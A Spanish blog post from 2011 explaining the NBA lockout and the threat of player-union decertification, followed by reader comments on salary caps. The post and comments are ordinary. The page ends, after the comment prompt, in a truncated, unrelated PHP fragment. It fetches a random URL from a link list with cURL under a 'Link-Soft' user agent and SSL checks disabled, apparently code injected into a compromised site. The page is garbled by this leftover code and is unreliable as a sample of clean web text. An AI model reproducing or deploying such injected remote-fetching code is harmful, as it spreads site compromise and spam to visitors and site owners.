Ampliando vocabulario del lockout: decertificación

20 de September de 2011 por Jose_Dantley

La semana pasada no nos trajo buenas noticias respecto al fin del lockout. Las negociaciones quedaron nuevamente rotas y –en apariencia- no hubo avances significativos. Sin embargo, mientras los dueños parecen, al menos hacia el exterior, guardar una imagen de unidad respecto a David Stern, los jugadores muestran síntomas de cansancio.

La primera noticia impactante de la semana fue la carta enviada por el presidente del sindicato, Derek Fisher, a sus compañeros. La carta –como ya autoprofetizaba en la misiva el propio Fisher- fue filtrada. Podéis ver la carta completa en Sports Illustrated. En resumen, la carta refleja la voluntad negociadora del base de los Lakers, la voluntad de defender a todos los jugadores por igual, la necesidad de evitar caer en la trama de rumores –Fisher ruega a sus compañeros que hablen con él- y, sorprendentemente, la acusación de que hay división interna entre los equipos lo que hace que la negociación no avance. Este último punto ha sido categóricamente desmentido por Stern. Entramos, como es habitual, en el juego de quién es el malo de película ante los seguidores de la NBA. Según Fisher se está más cerca del acuerdo que una semana atrás.

Sin embargo, algunos jugadores a través de sus agentes parecen estar dispuestos a jugar más duro de lo que Fisher y el director del sindicato, Billy Hunter, están dispuestos a hacer. Sports Illustrated sacaba a la luz la propuesta firme de Leon Rose, agente de LeBron James, Chris Paul y Carmelo Anthony entre otros, de decertificar el sindicato. Podría ser que agentes tan relevantes como Arm Tellem –Pau Gasol, John Wall, Marc Gasol- o Dan Fegan –Dwight Howard, John Wall, Ricky Rubio- apoyaran la medida.

Pero, ¿qué es la decertificación? En primer lugar es un término de traducción muy forzada. Viene del término inglés decertification, pero en realidad, no existe como tal una traducción literal salvo en contextos –desaprobación, penalización- que no tienen nada que ver con el que estamos tratando. Resumidamente es, bajo el derecho laboral americano, la opción que tienen los miembros de un sindicato de anular su registro en el sindicato de manera colectiva, con lo cual el sindicato dejaría de existir.

¿Por qué es importante la decertificación en este caso? En Estados Unidos, pese al mito de que es un país abierto al libre mercado, existen leyes muy restrictivas del monopolio y el oligopolio –existencia de pocas empresas suministrando un producto similar-. La NBA tiene una serie de características que según las leyes estadounidenses hace que esté sujeta a las leyes de defensa de la competencia. La negociación de los convenios debe realizarse con el sindicato de jugadores.  Si el sindicato deja de existir –decertificación- los jugadores podrían individualmente demandar a los equipos por posición dominante. Si la demanda sería aceptada o no, estaría en discusión. La NFL ha sufrido esta táctica alguna que otra vez con resultados dispares. Si se acepta sería un torpedo en la línea de flotación de la liga. Los jugadores son conscientes de que el daño sería para todos, pero lo pueden utilizar como se utilizaba la amenaza nuclear durante la Guerra Fría. Esperemos acontecimientos, pero el recurso a la decertificación significaría casi definitivamente que no habría liga como mínimo hasta enero, más probablemente hasta dentro de un año.

Se han filtrado algunos avances, como la oferta de los jugadores de bajar el montante salarial entre el 52% y el 54% de los ingresos, pero parece que las franquicias quieren modificar completamente el sistema de topes salariales. No obstante, no parece claro si todos los equipos quieren modificaciones similares, dado que para algunos significaría perder alguna de sus estrellas.

Durante la semana, actualizaremos la situación del lockout. Esperemos que la solución llegue pronto, dado que la cuenta atrás se va agotando. A día de hoy, no parece fácil que veamos NBA en noviembre.

Comenta

8 comentarios a esta entrada

  1. M dice:
    #1

    Supongo que el tren de vida de muchos jugadores y el dinero que están dejando de ganar hace que el tiempo juegue a favor de la patronal. ún así, darse de baja de un sindicato en plena huelga me parecería tremendo.

    Saludos 🙂

      Citar

  2. Jose_Dantley dice:
    #2

    Realmente no es una huelga, es un cierre patronal. Son las franquicias las que han cerrado temporalmente el negocio. Darse de baja en masa, es decir, cerrar el sindicato sería una medida -drástica- de presión.

    Llevas toda la razón en que el tren de vida de bastantes jugadores juega en su contra y pondrá nerviosos a muchos. Ha calado en muchos medios la imagen de que todo esto es un conflicto entre billonarios (en España sería milmillonarios) y millonarios, con lo que en teoría los billonarios pueden esperar más.

      Citar

  3. M dice:
    #3

    Cierto, gracias por la precisión 🙂

      Citar

  4. Denise dice:
    #4

    y a todo esto…qué es lo que piden los jugadores y qué los equipos…

      Citar

  5. Txusma dice:
    #5

    El meollo está en que ahora los jugadores se llevan en salarios creo que el 56% o más de los ingresos y los propietarios querrían bajar el porcentaje hasta el 50% o incluso menos. Después, para conseguir esto, ya vienen temas de limites salariales, excepciones, etc… Los propietarios, en general, quiere que no haya muchas oportunidades de gastar mucho dinero (aunque las franquicias ricas tampoco están muy de acuerdo) y los jugadores quieren que las franquicias tengan muchas facilidades para gastar. Así les seguirán sobrepagando 🙂

      Citar

  6. HisRoyalAirness dice:
    #6

    Yo, visto lo visto en los últimos años, creo que la mejor solución sería mantener el límite y prohibir terminantemente las excepciones.
    Debe premiarse la buena gestión y el buen hacer en cuanto a trades y draft picks en equipos como OKC y no fomentar el modelo Miami o Dallas (que aunque parezca que vencieron al mal, son el equipo que más gasta en plantilla de toda la NBA).
    Al final hay una serie de equipos en los que los jugadores sólo buscan hacerse notar para conseguir un buen traspaso a otro equipo más competitivo; bien es cierto que gran parte de este problema es el exceso de equipos y la dispersión de estrellas pero se supone que una liga de franquicias debe buscar el máximo grado de competitividad.
    También es cierto que esta situación es culpa de las propias franquicias por ofrecer contratos multianuales, no sería mala idea comentar este punto por aquí. Porque hay equipos que se están comiendo “con patatas” contratos como los 22 kilos de Rashard Lewis o los 19 de Arenas y eso es por una pésima gestión, también fomentada por el modelo de negocio que se está saliendo de madre

      Citar

  7. Txusma dice:
    #7

    A nosotros ya nos mola que haya igualdad entre franquicias y que los Clippers puedan un día ser mejores que los Lakers, pero los propietarios de los grandes no piensan lo mismo. Dallas, Miami, Los Angeles… son grandes, en parte, pq tienen propietarios dispuestos a soltar la pasta cuando toca. Evidentemente, no les convence eso de límites salariales duros y 0 excepciones.

      Citar

  8. Denise dice:
    #8

    En efecto, lo mejor que le podría pasar a la NBA sería un limite salarial sin excepciones, donde el que mejor lo haga en los despachos tenga el 75% posibilidades de ganar.
    Lo peor, que se pueda gastar lo que a cada propietario le salga de las bolas, y esto se convierta en una liga como la española de futbol, con Lakers, Dallas, N York y tres equipos más con 10 all-stars y el resto con las migajas….

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>